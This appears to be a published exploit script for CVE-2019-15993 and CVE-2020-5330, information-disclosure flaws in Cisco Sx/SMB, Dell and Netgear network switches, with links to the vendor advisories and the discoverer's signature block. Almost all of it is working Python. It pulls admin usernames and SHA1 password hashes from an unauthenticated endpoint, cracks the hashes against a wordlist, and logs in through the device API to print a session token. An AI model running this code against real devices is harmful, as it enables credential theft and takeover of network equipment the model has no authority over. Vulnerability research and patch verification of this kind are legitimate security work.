Cisco / Dell / Netgear Information Disclosure / Hash Decrypter

`# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure  
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability>  
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos  
  
  
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter  
# Discovered by Ken 's1ngular1ty' Pyle  
  
  
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter  
# Discovered by Ken 's1ngular1ty' Pyle  
  
  
import requests  
import re  
import hashlib  
import sys  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
if len(sys.argv) < 3:  
print("Usage: python cve-2019-15993.py URL passwordfile")  
sys.exit()  
  
url = sys.argv[1]  
file = sys.argv[2]  
  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
def hash_value(value):  
"""Calculate the SHA1 hash of a value."""  
sha1 = hashlib.sha1()  
sha1.update(value.encode('utf-8'))  
return sha1.hexdigest()  
  
def userName_parser(text, start_delimiter, end_delimiter):  
results = []  
iteration = 0  
start = 0  
while start >= 0:  
start = text.find(start_delimiter, start)  
if start >= 0:  
start += len(start_delimiter)  
end = text.find(end_delimiter, start)  
if end >= 0:  
results.append(text[start:end])  
start = end + len(end_delimiter)  
  
iteration = iteration + 1  
return results  
  
# retrieve the web page  
response = requests.get(url, allow_redirects=False, verify=False)  
  
# Read in the values from the file  
with open(file, 'r') as f:  
values = f.readlines()  
  
values = [value.strip() for value in values]  
hashes = {hash_value(value): value for value in values}  
  
if response.status_code == 302:  
print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")  
url = response.headers["Location"] + "config/device/adminusersetting"  
response=requests.get(url, verify=False)  
  
if response.status_code == 200:  
print("[*] Successful request to URL:", url + "\n")  
content = response.text  
users_names = userName_parser(content,"<userName>","</userName>")  
sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)  
  
print("SHA1 Hashes found:\n")  
  
loops = 0  
while loops < len(sha1_hashes):  
print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")  
  
  
for sha1_hash in sha1_hashes:  
if sha1_hash in hashes:  
print("Match:", sha1_hash, hashes[sha1_hash])  
print("\nTesting Credentials via API.\n\n")  
payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])  
  
response_login = requests.get(payload, allow_redirects=False, verify=False)  
headers = response_login.headers  
if "sessionID" in headers:  
print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")  
print(headers["sessionID"])  
else:  
print("Unable to sign in.")  
loops = loops + 1  
else:  
print("Host is not vulnerable:", response.status_code)  
  
  
  
  
  
  
[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]  
Ken Pyle  
M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+  
Main: 267-540-3337  
Direct: 484-498-8340  
Email: [email protected]  
Website: www.cybir.com  
  
`